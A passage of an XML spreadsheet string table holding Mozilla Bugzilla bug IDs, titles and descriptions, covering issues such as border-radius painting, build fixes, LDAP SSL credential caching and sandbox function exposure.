  </si>
  <si>
    <t>WEBTOOLS_GRAVEYARD-5413</t>
  </si>
  <si>
    <t>Tinderbox: Dead joke images should be removed</t>
  </si>
  <si>
    <t>Many times when visiting the tinderbox page the joke image
at the top is a broken link.  Dead images should be reaped
out of the pool automatically on a weekly or daily basis.</t>
  </si>
  <si>
    <t>CORE-364861</t>
  </si>
  <si>
    <t>[FIX]Inconsistent handling of percentage values of border-radius</t>
  </si>
  <si>
    <t>When painting the border we use the passed-in border rect's width as the percentage base while when painting the background we use the background clip rect's width.  These definitely don't match when -moz-background-clip: padding is set.</t>
  </si>
  <si>
    <t>CORE-368890</t>
  </si>
  <si>
    <t>reftest bugs/9458-zorder-4 failing on windows</t>
  </si>
  <si>
    <t>rcampbell</t>
  </si>
  <si>
    <t>CORE-445262</t>
  </si>
  <si>
    <t>display closure optimizations for SpiderMonkey part I</t>
  </si>
  <si>
    <t>Patch forthcoming inspired by Chez Scheme. Need to get it working and measure a bit first.
/be</t>
  </si>
  <si>
    <t>BUGZILLA-512598</t>
  </si>
  <si>
    <t>Save Changes button is no longer aligned with the comment box if you are in the insidergroup</t>
  </si>
  <si>
    <t>Because I made the private-checkbox text so long the Save Changes button is no longer aligned with the comment box (because it's floated-right in a table that now stretches too far). The solution should be pretty simple--to just take the Additional Comments header out of the table and just put the box and the buttons in a table.</t>
  </si>
  <si>
    <t>SOCORRO-487635</t>
  </si>
  <si>
    <t>Socorro Server: alter processor.py and externalprocessor.py for dumps external to the database</t>
  </si>
  <si>
    <t>The code for processor must be changed to write dumps to the new json storage technique.  The unit tests for processor.py and externalprocessor.py will also need to change.</t>
  </si>
  <si>
    <t>CORE_GRAVEYARD-220832</t>
  </si>
  <si>
    <t>Url extension gets added to the filename specified in content-disposition if it doesn't have one.</t>
  </si>
  <si>
    <t>this is a variant of Bug 65827 the filename of the content-disposition header
doesn't have an extension and it's sent as application-octect stream but if the
page is called without any parameter then Mozilla (Mozilla/5.0 (Windows U
Windows NT 5.1 en-US rv:1.6a) Gecko/20030930) adds .asp to the suggested filename.
(the testcase now doesn't have spaces and it's properly quoted)</t>
  </si>
  <si>
    <t>amla70</t>
  </si>
  <si>
    <t>MOZILLA.ORG_GRAVEYARD-456627</t>
  </si>
  <si>
    <t>Can't upload psd files to spread firefox site</t>
  </si>
  <si>
    <t>On stage trying to upload psd's to the following page (see middle of the page):
https://spreadfirefox.authstage.mozilla.com/affiliatescreatebutton
However I get a page not found error when doing this (I'm not in preview mode -- I actually submitted everything).  I don't want to have these publicly viewable before the larger set of affiliate content pages go live.
The files I attached are at the following url's:
http://www.spreadfirefox.com/files/110x32_best_edit.psd
http://www.spreadfirefox.com/files/110x32_get_edit.psd
http://www.spreadfirefox.com/files/80x15_edit.psd
http://www.spreadfirefox.com/files/200x32_all_edit.psd
http://www.spreadfirefox.com/files/200x32_best_edit.psd
http://www.spreadfirefox.com/files/468x60_edit.psd</t>
  </si>
  <si>
    <t>drolnitzky</t>
  </si>
  <si>
    <t>CORE-510523</t>
  </si>
  <si>
    <t>DOM: Geolocation</t>
  </si>
  <si>
    <t>Checking Remember for this site stops prompt from working on file:// URIs</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (X11 U Linux i686 en-GB rv:1.9.1.2) Gecko/20090729 Firefox/3.1
Build Identifier: Mozilla/5.0 (X11 U Linux i686 en-US rv:1.9.2a2pre) Gecko/20090814 Minefield/3.6a2pre
If you check the Remember for this site checkbox on the geolocation prompt for a file:// URI clicking the Share Location or Don't Share buttons does nothing.
Reproducible: Always
Steps to Reproduce:
1. Open a file that requests the use of geolocation.
2. Click the Remember for this site checkbox on the prompt
3. Click either of the action buttons on the prompt.
Actual Results:  
The buttons click but don't submit the prompt.
Expected Results:  
The prompt should disappear and the preference to remember the decision should be stored.
Error console output on clicking the buttons:
Error: uncaught exception: [Exception... Component returned failure code: 0x8000ffff (NS_ERROR_UNEXPECTED) [nsIPermissionManager.add]  nsresult: 0x8000ffff (NS_ERROR_UNEXPECTED)  location: JS frame :: file:///home/martin/mozilla-src/src/obj-i686-pc-linux-gnu/dist/bin/components/nsBrowserGlue.js :: setPagePermission :: line 1038  data: no]</t>
  </si>
  <si>
    <t>mmcnicklebugs</t>
  </si>
  <si>
    <t>RELEASE_ENGINEERING-566426</t>
  </si>
  <si>
    <t>[Tracking bug] Downtime for 8am PDT May 20 2010</t>
  </si>
  <si>
    <t>CORE-161722</t>
  </si>
  <si>
    <t>nsFilePicker.js has unreachable code (try block)</t>
  </si>
  <si>
    <t>i was cleaning other stuff out and ran across this</t>
  </si>
  <si>
    <t>FIREFOX_BUILD_SYSTEM-421255</t>
  </si>
  <si>
    <t>fix misc mingw cross-compile issues</t>
  </si>
  <si>
    <t>Created attachment 307668
v1.0
This bug is mainly a support bug for bug 421095. It covers misc issues not already covered by other bugs.  
The first patch fixes the case-sensitivity issue with the headers when cross-compiling.</t>
  </si>
  <si>
    <t>CORE_GRAVEYARD-226288</t>
  </si>
  <si>
    <t>freetype code uses ceiling when rounding is better</t>
  </si>
  <si>
    <t>spun off from bug 222920.
dbaron found that freetype library itself uses rounding whenever it wants to
convert 'design' units to pixels and fixed it in nsFontMetricsXft. We have to
fix it in nsFreetype.cpp as well. It uses ceiling in several places. 
FT_CEIL used there is defined here (I think I copied MOZ_FT_CEILING from here):
http://lxr.mozilla.org/seamonkey/source/gfx/idl/nsIFreeType2.idl#51</t>
  </si>
  <si>
    <t>SKYWRITER_GRAVEYARD-478421</t>
  </si>
  <si>
    <t>File Explorer</t>
  </si>
  <si>
    <t>Dragging Open Session Windows up causes it to go white</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 6.0 en-US rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6
Build Identifier: 
While viewing the filelist of a project and dragging the height of the window of the open sessions area up upon reaching the file list the Open Sessions window turns white and you are unable to do anything within Bespin unless you go back to the main page and then go back into the dashboard.
Reproducible: Always
Steps to Reproduce:
1.Go into Bespin Dashboard
2.Select Project to display file list
3.Drag the Open Sessions bar up to the file list
Actual Results:  
Open Sessions Area turns white Bespin becomes un-usable
Expected Results:  
Open Session should stop at a certain height or at least continue to be able to be height adjustable. Rest of site should still be usable.</t>
  </si>
  <si>
    <t>webrogue</t>
  </si>
  <si>
    <t>CORE-418314</t>
  </si>
  <si>
    <t>test failures on debug-threadsafe Linux shell after native-array landing</t>
  </si>
  <si>
    <t>+++ This bug was initially created as a clone of Bug #322889 +++
The bug 322889 regressed the following tests in a debug thread-safe build of jsshell:
js1_5/extensions/regress-311792-02.js
js1_5/extensions/regress-355497.js
js1_5/extensions/regress-311792-01.js
js1_5/extensions/regress-365692.js
js1_5/extensions/regress-315509-02.js
js1_6/extensions/regress-414098.js
A typical regression looks like:
-*- executing: ./../src/Linux_All_DBG.OBJ/js  -f ./shell.js -f ./js1_5/shell.js -f ./js1_5/extensions/shell.js -f ./js1_5/extensions/regress-311792-02.js -f ./js-\
test-driver-end.js                                                                                                                                                 
*-* Testcase js1_5/extensions/regress-311792-02.js failed:                                                                                                         
Expected exit code 0 got 0                                                                                                                                        
Testcase terminated with signal 5                                                                                                                                  
Complete testcase output was:                                                                                                                                      
Assertion failure: OBJ_IS_NATIVE(obj) at jslock.c:1222</t>
  </si>
  <si>
    <t>CORE_GRAVEYARD-108000</t>
  </si>
  <si>
    <t>Unicode file name support in Mozilla</t>
  </si>
  <si>
    <t>I am filing this as a meta bug.
Now the lates OS (XP OSX) support Unicode file name we want to provide the
support in Mozilla instead of restricted by a system charset.</t>
  </si>
  <si>
    <t>nhottanscp</t>
  </si>
  <si>
    <t>BUGZILLA.MOZILLA.ORG-318020</t>
  </si>
  <si>
    <t>Not always mailed when security group removed</t>
  </si>
  <si>
    <t>As far as I can tell security@mozilla.org is always mailed when a *new* bug is filed with the security group box checked. At least some of the time we're mailed when the group is UN-set but there are several times I know of that I have gone to a newly filed security bug and found that the security group checkmark has been removed but no mail is ever received.
This makes me wonder if there are times when the group is set on non-new bugs that I'm not getting mail for and of course not knowing when a bug goes public is itself a potentially bad thing.
Could this have something to do with UNCONFIRMED bugs? I don't know if this has always been true but the recent ones that have exhibited this problem were all UNCO bugs. Could the security@mozilla.org account be set not to be mailed on UNCO bugs?
This problem *might* be since the recent BMO upgrade I can't remember when I first started noticing this. It's possible it's been around longer and I only noticed recently now that a new member of the security group has started to help triage the incoming.</t>
  </si>
  <si>
    <t>CORE-94768</t>
  </si>
  <si>
    <t>provide a switch to turn off the building of Acccessibility</t>
  </si>
  <si>
    <t>This is being driven by two factors:
1) There may be builds that do not want to include the building of
accessibility. For instance in a PDA-type device where there is no MSAA
accessibility and they have severly limited space.
2) The fix for bug 77648 has introduced a dependancy on MS Active Template
Libraries ( for windows builds only ) and some people may not want to install
those pieces of the development toolkit. Not to mention we are trying to keep
the codebase as compiler agnostic as possible ( although ATL seems to be
implemented on more than just the MSVC++ compiler -- Borland ).</t>
  </si>
  <si>
    <t>CORE-237944</t>
  </si>
  <si>
    <t>The name of Bookmark dragged from IE is the same as URL</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.0 en-US rv:1.6) Gecko/20040206 Firefox/0.8
Build Identifier: Mozilla/5.0 (Windows U Windows NT 5.0 en-US rv:1.6) Gecko/20040206 Firefox/0.8
When Dragging an Internet Explorer Favorite to Firefox bookmark. The name of
that bookmark is always set as the URL although in IE it isnâ€™t
Reproducible: Always
Steps to Reproduce:
1. Visit http://www.fit.edu on Internet Explorer and save it as Favorite
2. Also open a Firefox 0.8 browser and draw the above Favorite from IE to bookmark
3. Notice the name is http://www.fit.edu rather than â€œFlorida Institute of
Technologyâ€
Actual Results:  
The dragging in bookmark name is the same as URL
Expected Results:  
The dragging in bookmark name is as in the source place (IE Favorite)</t>
  </si>
  <si>
    <t>fwu</t>
  </si>
  <si>
    <t>CORE-416942</t>
  </si>
  <si>
    <t>[FIX]Give agent (and maybe user?) sheets the system principal</t>
  </si>
  <si>
    <t>That way agent sheets can link in chrome images and such even when we start tightening up our CheckLoadURI checks.
We can either do this for all sheets coming through LoadSheetSync() do it for sheets that are allowed to have unsafe rules (and change the scrollbar sheet load to allow unsafe rules) or add a flag to LoadSheetSync indicating whether this should happen.
Another option is to only _force_ this for sheets that allow unsafe rules but to change all chrome:// (not just content packages) to return the system principal from the channel that would give it to the scrollbar sheet in particular.
The most flexible solution is adding another argument of course.
Thoughts?</t>
  </si>
  <si>
    <t>BUGZILLA-330577</t>
  </si>
  <si>
    <t>its is wrong in comment</t>
  </si>
  <si>
    <t>96                 # in the id its already had to validate (or the User.pm object of course)</t>
  </si>
  <si>
    <t>FIREFOX_BUILD_SYSTEM-387766</t>
  </si>
  <si>
    <t>Version/config bumps for Fx 2005</t>
  </si>
  <si>
    <t>Tracking bug for version and config bumps for the Firefox 2.0.0.4 release.</t>
  </si>
  <si>
    <t>MOZILLA.ORG_GRAVEYARD-390649</t>
  </si>
  <si>
    <t>amo.nl does not enforce HTTPS</t>
  </si>
  <si>
    <t>When I call AMO over here with http:// I do not get pushed over to HTTPS anymore (even though that worked before).
The IP is: 63.245.213.32 -- is that AMO.nl?
CCing mrz since clouserw confirmed correct behavior from Oregon.</t>
  </si>
  <si>
    <t>WEBMAKER_GRAVEYARD-765870</t>
  </si>
  <si>
    <t>Thimble</t>
  </si>
  <si>
    <t>WEBMAKER_GRAVEYARD</t>
  </si>
  <si>
    <t>500 error for https://thimble.webmaker.org/</t>
  </si>
  <si>
    <t>I get served a 500 error at https://thimble.webmaker.org/. As I understand from Matt's e-mail this site has its public launch today. Probably want to get this cleared up ASAP.</t>
  </si>
  <si>
    <t>CORE-417791</t>
  </si>
  <si>
    <t>implement rowHeader attribute for tables</t>
  </si>
  <si>
    <t>the code comment at http://bonsai.mozilla.org/cvsblame.cgi?file=mozilla/accessible/src/html/nsHTMLTableAccessible.cpp&amp;rev=1.59&amp;mark=287-292#277 is bogus.
HTML tables identify row header cells with scope=row. This is known since 1999 from HTML 4.0 times and defined also up to the XHTML 1.1 standards even XHTML 2 http://www.w3.org/TR/xhtml2/mod-tables.html#adef_tables_scope and in HTML 5 it will also be http://www.whatwg.org/specs/web-apps/current-work/#scope0</t>
  </si>
  <si>
    <t>surkov.alexander</t>
  </si>
  <si>
    <t>SEAMONKEY-366344</t>
  </si>
  <si>
    <t>Create MPL license file for SeaMonkey installer</t>
  </si>
  <si>
    <t>Recently the mozilla/LICENSE file was changed to include a placeholder text instead of the MPL. This change was backed out but the back-out should soon be backed out again. So this bug here is for fixing the SeaMonkey installer. The solution is to create a MPL license text file somewhere in xpinstall/packager/ and fix the paths in the packager files.</t>
  </si>
  <si>
    <t>SEAMONKEY-25949</t>
  </si>
  <si>
    <t>What we have to do to upgrade to Pro5</t>
  </si>
  <si>
    <t>We need to adjust the access paths on each of the following projects.
I built this list with a search in MPW:
  Files -f -o -r -s -t MMPr Akron:Mozilla:Source:mozilla:mozilla: *
   | Search -q .mcp *
   | Search -r -q IDL.mcp
Then I divided the list up among the volunteers such that no directory was split 
between two people.  Here's what needs to be done: for each target in each of 
your projects if any access path leads _into_ the MacOS Support folder make it 
lead _to_ the MacOS Support folder (and eliminated duplicates).  Simon mentioned 
another change that needed to be made ... Simon?
brade
:mozilla:build:mac:CustomLib:CustomLib.mcp
:mozilla:build:mac:test:test.mcp
:mozilla:build:mac:test:test2.mcp
:mozilla:build:mac:test:test3.mcp
:mozilla:build:mac:test:test4.mcp
:mozilla:caps:macbuild:Caps.mcp
:mozilla:db:mork:macbuild:mork.mcp
:mozilla:dbm:macbuild:DBM.mcp
:mozilla:dom:macbuild:dom.mcp
:mozilla:dom:src:jsurl:macbuild:JSUrl.mcp
:mozilla:dom:src:jsurl:macbuild:JSUrlDL.mcp
:mozilla:dom:tools:macbuild:IdlCompiler.mcp
:mozilla:editor:macbuild:editor.mcp
:mozilla:editor:txmgr:macbuild:txmgr.mcp
:mozilla:editor:txmgr:tests:macbuild:txmgrTEST.mcp
:mozilla:editor:txtsvc:macbuild:txtsvc.mcp
:mozilla:expat:macbuild:expat.mcp
pinkerton
:mozilla:intl:chardet:macbuild:chardet.mcp
:mozilla:intl:chardet:macbuild:classicChardet.mcp
:mozilla:intl:compatibility:macbuild:intlcmpt.mcp
:mozilla:intl:locale:macbuild:locale.mcp
:mozilla:intl:locale:tests:macbuild:LocaleSelfTest.mcp
:mozilla:intl:locale:tests:macbuild:nsLocaleTest.mcp
:mozilla:intl:lwbrk:macbuild:lwbrk.mcp
:mozilla:intl:strres:macbuild:strres.mcp
:mozilla:intl:uconv:macbuild:TestUConv.mcp
:mozilla:intl:uconv:macbuild:uconv.mcp
:mozilla:intl:uconv:macbuild:ucvcn.mcp
:mozilla:intl:uconv:macbuild:ucvibm.mcp
:mozilla:intl:uconv:macbuild:ucvja.mcp
:mozilla:intl:uconv:macbuild:ucvko.mcp
:mozilla:intl:uconv:macbuild:ucvlatin.mcp
:mozilla:intl:uconv:macbuild:ucvtw.mcp
:mozilla:intl:uconv:macbuild:ucvtw2.mcp
:mozilla:intl:unicharutil:macbuild:unicharutil.mcp
:mozilla:intl:unicharutil:tests:macbuild:UnicharUtilSelfTest.mcp
ducarroz
:mozilla:mailnews:addrbook:macbuild:msgAddrbook.mcp
:mozilla:mailnews:base:macbuild:msgCore.mcp
:mozilla:mailnews:base:util:macbuild:msgUtil.mcp
:mozilla:mailnews:compose:macbuild:msgCompose.mcp
:mozilla:mailnews:db:macbuild:msgDB.mcp
:mozilla:mailnews:db:mork:macbuild:mork.mcp
:mozilla:mailnews:imap:macbuild:msgimap.mcp
:mozilla:mailnews:import:eudora:macbuild:msgImportEudora.mcp
:mozilla:mailnews:import:macbuild:msgImport.mcp
:mozilla:mailnews:import:text:macbuild:msgImportText.mcp
:mozilla:mailnews:local:macbuild:msglocal.mcp
:mozilla:mailnews:mime:cthandlers:calendar:macbuild:calendar.mcp
:mozilla:mailnews:mime:cthandlers:signstub:macbuild:signed.mcp
:mozilla:mailnews:mime:cthandlers:smimestub:macbuild:smime.mcp
:mozilla:mailnews:mime:cthandlers:vcard:macbuild:vcard.mcp
:mozilla:mailnews:mime:emitters:macbuild:mimeEmitter.mcp
:mozilla:mailnews:mime:macbuild:mime.mcp
:mozilla:mailnews:news:macbuild:msgnews.mcp
saari
:mozilla:gfx:macbuild:gfx.mcp
:mozilla:gfx:tests:coverage:macbuild:converage.mcp
:mozilla:htmlparser:macbuild:htmlparser.mcp
:mozilla:jpeg:macbuild:JPEG.mcp
:mozilla:js:macbuild:JavaScript.mcp
:mozilla:js:macbuild:JSLoader.mcp
:mozilla:js:macbuild:LiveConnect.mcp
:mozilla:js:macbuild:LiveConnectClasses.mcp
:mozilla:js:macbuild:TestXPC.mcp
:mozilla:js:macbuild:XPConnect.mcp
:mozilla:js:src:liveconnect:macbuild:LiveConnect.mcp
:mozilla:js:src:liveconnect:macbuild:LiveConnectShell.mcp
:mozilla:js:src:macbuild:JSRef.mcp
:mozilla:layout:macbuild:layout.mcp
':mozilla:lib:mac:embedding:powerplant:PowerPlant Appearance.mcp'
:mozilla:lib:mac:InterfaceLib:Interface.mcp
:mozilla:lib:mac:MacMemoryAllocator:MemAllocator.mcp
:mozilla:lib:mac:MacMemoryAllocator:test:MemoryTest.mcp
:mozilla:lib:mac:MoreFiles:build:MoreFilesPPC.mcp
:mozilla:lib:mac:NSRuntime:NSRuntime.mcp
:mozilla:lib:mac:NSStartup:NSStartup.mcp
:mozilla:lib:mac:NSStdLib:NSStdLib.mcp
:mozilla:lib:mac:PowerPlant:PowerPlant.mcp
davidm
:mozilla:extensions:cookie:macbuild:cookie.mcp
:mozilla:extensions:irc:macbuild:irc.mcp
:mozilla:extensions:wallet:editor:macbuild:WalletEditor.mcp
:mozilla:extensions:wallet:macbuild:wallet.mcp
:mozilla:extensions:wallet:macbuild:walletviewers.mcp
:mozilla:gc:boehm:macbuild:gc.mcp
':mozilla:gc:boehm:macbuild:gctest++.mcp'
:mozilla:gc:boehm:macbuild:gctest.mcp
:mozilla:modules:libimg:macbuild:gifdecoder.mcp
:mozilla:modules:libimg:macbuild:jpgdecoder.mcp
:mozilla:modules:libimg:macbuild:libimg.mcp
:mozilla:modules:libimg:macbuild:png.mcp
:mozilla:modules:libimg:macbuild:pngdecoder.mcp
:mozilla:modules:libjar:macbuild:libjar.mcp
:mozilla:modules:libpref:macbuild:libpref.mcp
:mozilla:modules:libreg:macbuild:libreg.mcp
:mozilla:modules:libutil:macbuild:libutil.mcp
:mozilla:modules:oji:macbuild:oji.mcp
:mozilla:modules:plugin:macbuild:plugin.mcp
:mozilla:modules:zlib:macbuild:zlib.mcp
sdagley
:mozilla:netwerk:cache:macbuild:nkcache.mcp
:mozilla:netwerk:macbuild:netwerk.mcp
:mozilla:netwerk:mime:macbuild:mime.mcp
:mozilla:netwerk:protocol:about:macbuild:about.mcp
:mozilla:netwerk:protocol:data:macbuild:data.mcp
:mozilla:netwerk:protocol:file:macbuild:file.mcp
:mozilla:netwerk:protocol:ftp:macbuild:ftp.mcp
:mozilla:netwerk:protocol:http:macbuild:http.mcp
:mozilla:netwerk:protocol:jar:macbuild:jar.mcp
:mozilla:netwerk:protocol:keyword:macbuild:keyword.mcp
:mozilla:netwerk:protocol:res:macbuild:res.mcp
:mozilla:netwerk:protocol:resource:macbuild:resource.mcp
:mozilla:netwerk:streamconv:macbuild:multiMixedConv.mcp
:mozilla:netwerk:streamconv:macbuild:streamconv.mcp
:mozilla:netwerk:util:macbuild:netwerkUtil.mcp
:mozilla:nsprpub:macbuild:NSPR20PPC.mcp
:mozilla:nsprpub:pr:tests:macbuild:NSPR20TestApp.mcp
sfraser
:mozilla:plugin:oji:MRJ:plugin:MRJConsole.mcp
:mozilla:plugin:oji:MRJ:plugin:MRJInABox.mcp
:mozilla:plugin:oji:MRJ:testing:ConsoleApplet:ConsoleApplet.mcp
:mozilla:plugin:oji:MRJ:testing:JSApplet:JSApplet.mcp
:mozilla:plugin:oji:MRJ:testing:SwingApplet:TestApplet.mcp
:mozilla:plugin:oji:MRJ:testing:TrivialApplet:MyApplet.mcp
:mozilla:profile:macbuild:profile.mcp
:mozilla:profile:pref-migrator:macbuild:prefmigrator.mcp
:mozilla:rdf:brprof:build:brprof.mcp
:mozilla:rdf:chrome:build:chrome.mcp
:mozilla:rdf:macbuild:rdf.mcp
:mozilla:rdf:tests:domds:macbuild:DOMDataSource.mcp
:mozilla:sun-java:stubs:macbuild:JavaStubs.mcp
:mozilla:uriloader:macbuild:uriLoader.mcp
:mozilla:view:macbuild:view.mcp
:mozilla:webshell:embed:mac:RaptorShell.mcp
:mozilla:webshell:macbuild:webshell.mcp
:mozilla:webshell:tests:viewer:mac:viewer.mcp
:mozilla:widget:macbuild:widget.mcp
:mozilla:widget:tests:scribble:mac:scribble.mcp
:mozilla:widget:tests:widget:mac:widgettest.mcp
scc
:mozilla:xpcom:macbuild:FilesTest.mcp
:mozilla:xpcom:macbuild:xpcomPPC.mcp
:mozilla:xpcom:proxy:macbuild:proxy.mcp
:mozilla:xpcom:proxy:macbuild:tests.mcp
:mozilla:xpcom:sample:macbuild:Sample.mcp
:mozilla:xpcom:tests:macbuild:COMTest.mcp
:mozilla:xpcom:tests:macbuild:RegFactory.mcp
:mozilla:xpcom:tools:registry:macbuild:RegExport.mcp
:mozilla:xpcom:tools:registry:macbuild:RegXPCOM.mcp
:mozilla:xpcom:typelib:xpidl:macbuild:test:test.mcp
:mozilla:xpcom:typelib:xpt:macbuild:libxpt.mcp
:mozilla:xpcom:typelib:xpt:macbuild:tests.mcp
:mozilla:xpcom:typelib:xpt:macbuild:tools.mcp
:mozilla:xpfe:AppCores:macbuild:AppCores.mcp
:mozilla:xpfe:appshell:macbuild:AppShell.mcp
:mozilla:xpfe:bootstrap:macbuild:apprunner.mcp
:mozilla:xpfe:browser:macbuild:mozBrowser.mcp
:mozilla:xpfe:components:bookmarks:macbuild:Bookmarks.mcp
:mozilla:xpfe:components:directory:Directory.mcp
:mozilla:xpfe:components:find:macbuild:FindComponent.mcp
:mozilla:xpfe:components:history:macbuild:history.mcp
:mozilla:xpfe:components:prefwindow:macbuild:prefwindow.mcp
:mozilla:xpfe:components:regviewer:RegViewer.mcp
:mozilla:xpfe:components:related:macbuild:Related.mcp
:mozilla:xpfe:components:sample:macbuild:sample.mcp
:mozilla:xpfe:components:search:macbuild:Search.mcp
:mozilla:xpfe:components:shistory:macbuild:shistory.mcp
:mozilla:xpfe:components:ucth:macbuild:ucth.mcp
:mozilla:xpfe:components:xfer:macbuild:xfer.mcp
:mozilla:xpfe:macbuild:xpfeviewer.mcp
:mozilla:xpinstall:macbuild:xpinstall.mcp
:mozilla:xpinstall:macbuild:xpistub.mcp
:mozilla:xpinstall:packager:mac:ASEncoder:build:ASEncoder.mcp
:mozilla:xpinstall:wizard:mac:macbuild:CheckboxLDEF.mcp
:mozilla:xpinstall:wizard:mac:macbuild:MIW.mcp</t>
  </si>
  <si>
    <t>scc-obsolete</t>
  </si>
  <si>
    <t>MOZILLA.ORG-246002</t>
  </si>
  <si>
    <t>webtree CVS account for YAMAGUCHI Satoru - syamagu@mozilla.gr.jp</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.0 en-US rv:1.6) Gecko/20040206 Firefox/0.8
Build Identifier: Mozilla/5.0 (Windows U Windows NT 5.0 en-US rv:1.6) Gecko/20040206 Firefox/0.8
I would like to obtain a cvs access so that I can pull the documents available
under mozilla.org for the Mozilla-gumi Japanese Translation Project.
For details see
http://groups.google.com/groups?dq=&amp;hl=en&amp;lr=&amp;ie=UTF-8&amp;threadm=ca5a0a%247it2%40ripley.netscape.com&amp;prev=/groups%3Fhl%3Den%26lr%3D%26ie%3DUTF-8%26q%3Dnetscape.public.mozilla.documentation%26btnG%3DSearch
Reproducible: Always
Steps to Reproduce:
1.
2.
3.</t>
  </si>
  <si>
    <t>syamagu.ml</t>
  </si>
  <si>
    <t>THUNDERBIRD-392113</t>
  </si>
  <si>
    <t>View / Character Encoding Menu is Missing on the Trunk</t>
  </si>
  <si>
    <t>Using a trunk build from today David and I just noticed that the View / Character encoding menu is missing.</t>
  </si>
  <si>
    <t>SEAMONKEY-389070</t>
  </si>
  <si>
    <t>Port bookmarks to frozen linkage</t>
  </si>
  <si>
    <t>Created attachment 273229
'Mechanical' changes (checked in)
As part of the move to libxul we need to move the bookmarks code over to the frozen linkage. This bug will do that.
I decided to do this before moving it to /suite because then we can keep everything in suite as frozen linkage and I'm considering starting to move other things before then which would conflict if we had a mixture of frozen &amp; unfrozen linkage there.
The first patch I'm attaching is mainly just 'mechanical' type changes there are a few ifdefs and #defines to make the whole task easier which will get tidied up with the final patch. Its mainly based on the conversion that /browser did for their bookmarks service.</t>
  </si>
  <si>
    <t>SEAMONKEY-167926</t>
  </si>
  <si>
    <t>Considerable Memory Usage increase</t>
  </si>
  <si>
    <t>Just watching the latest stats at
ftp://ftp.mozilla.org/pub/data/memtests/memtest_form.html
shows a considerable memory usage increase.
Any idea what could have caused this?</t>
  </si>
  <si>
    <t>twalker</t>
  </si>
  <si>
    <t>CORE-41435</t>
  </si>
  <si>
    <t>webshell leak for view source</t>
  </si>
  <si>
    <t>Doing a view source on any pages adds two web shells. Closing the window only
removes one. Tested on this mornings linux build. I've tested most of the other
tools (history search etc) and this is the only leak i'm getting...</t>
  </si>
  <si>
    <t>jmd</t>
  </si>
  <si>
    <t>MOZILLA_LABS-508019</t>
  </si>
  <si>
    <t>Update version numbers for 1.0b2</t>
  </si>
  <si>
    <t>Various files changed with the move from 1.0b1 to 1.0b2 and the repository hasn't been updated (in some cases since 0.9.9).</t>
  </si>
  <si>
    <t>DIRECTORY-485690</t>
  </si>
  <si>
    <t>LDAP C SDK</t>
  </si>
  <si>
    <t>DIRECTORY</t>
  </si>
  <si>
    <t>LDAP SSL connections with clientauth sometimes use wrong credentials</t>
  </si>
  <si>
    <t>Created attachment 369808
Patch v1 for LDAP C SDK
This problem is seen in client programs that use SSL clientauth and that 
use different credentials (client certificates) on different connections 
to the same server during the same process lifetime.  It is also seen in 
programs that use clientauth on some connections to a server but not on 
other connections to the same server during the same process lifetime.  
This is seen most commonly is test clients that are trying to simulate
different users but it may also be seen in servers that are trying to 
replicate different data sets to a remote server with a different client
credential for each different data set.  
The problem is that after one connection has been established between 
the client and the server using some (or no) credential all subsequent
connections to the same server may use the same credential (or same absent
credential) even if the client has called ldapssl_enable_clientauth 
specifying different credentials to be used for each subsequent connection.
Here is an explanation.  SSL remembers (caches) information about 
previously established sessions with remote clients and servers and 
reuses that information from old sessions whenever possible to minimize the 
expensive computational overhead of establishing new sessions with each new
connection.  When a new connection is made if the server says Let's reuse
the session we last used then the most recent session from that socket's
cache will be used even if that previous session was established using 
different credentials than the client now wishes to use.
NSS's SSL client library supports the use of multiple separate named caches 
to allow the sessions associated with one set of credentials to be remembered 
separately from the sessions associated with other sets of credentials.  
So a client program that uses credentials for Alice with some sockets and 
uses credentials for Bob with other sockets can have separate caches for Alice and Bob.  If the connections for Alice are configured to use Alice's 
cache and Bob's connections use Bob's cache all confusion over different 
credentials can be eliminated.  
When a program (or thread) uses a socket for which it has not configured an explicitly named socket then NSS uses a default unnamed cache for that 
socket.  There is only one default unnamed cache.  If multiple threads
trying to act as separate users do not specify explicitly named caches for
their respective users' identities then the separate users will end up 
using a common set of credentials from the common cache resulting in 
confusion.  
It may be reasonable for all LDAP connections that do NOT use client auth 
to share a common cache because each connections that uses no client auth 
typically is (re)authenticated using some other method such as simple name
and password authentication.  But it is not reasonable for client auth 
connections to share a cache with connections that use no client auth.
That is the problem experienced with the LDAP C SDK.  The LDAP C SDK never 
explicitly names a cache to be used with any SSL socket so all SSL sockets
share the common unnamed cache with the resulting identity confusion.  
A named cache is implicitly created the first time its name is configured 
to be used by a socket.  Cache entries have a lifetime after which they 
expire.  When all the cache entries for a named cache have expired the 
cache disappears.  So it's very easy to use named caches.  You just give
the name to the SSL socket before doing the first handshake on that socket
and SSL does the rest.  
I have attempted to modify the LDAP C SDK to do that to configure each 
SSL socket that will be used with a client certificate to use a cache with 
the same name as the nickname of the cert to be used.  I have attached 
to this bug an untested patch that I believe will solve the problem.  
I would like one of the LDAP C SDK cognoscenti (you know who you are :) to 
test this patch and see if it does indeed satisfactorily solve the problem 
for them.</t>
  </si>
  <si>
    <t>MOZILLA.ORG-461491</t>
  </si>
  <si>
    <t>Is the FreeType License compatible with the MPL?</t>
  </si>
  <si>
    <t>http://www.freetype.org/FTL.TXT
We're exploring using FreeType on windows ce but want to make sure the license is compatible with the MPL before we go to far.</t>
  </si>
  <si>
    <t>handerson</t>
  </si>
  <si>
    <t>CORE-379608</t>
  </si>
  <si>
    <t>Support text interfaces on doc accessibles</t>
  </si>
  <si>
    <t>The interfaces IAccessibleText IAccessibleEditableText and IAccessibleHyperText may sometimes be supported on an HTML document.</t>
  </si>
  <si>
    <t>CORE-336559</t>
  </si>
  <si>
    <t>Investigate a better security model for injecting functions into evalInSandbox</t>
  </si>
  <si>
    <t>Currently the accepted model for injecting functions into Components.utils.evalInSandbox is to simply stick the functions on the sandbox object itself. So in a JavaScript component one might do:
var box = new Components.utils.Sandbox(someURL)
box.foo = myFoo
box.bar = myBar
Components.utils.evalInSandbox(untrustedScript box)
As we saw in bug 321101 and friends this lends the untrusted script unwarrented access to the calling (chrome) code giving it a handle which it might be able to use to pull itself out of the sandbox and run chrome code. For bug 321101 (or more specifically bug 319263) we decided to plug all known holes that could lead out of the sandbox but that is really a stopgap solution. We should come up with a better way of exposing functions.
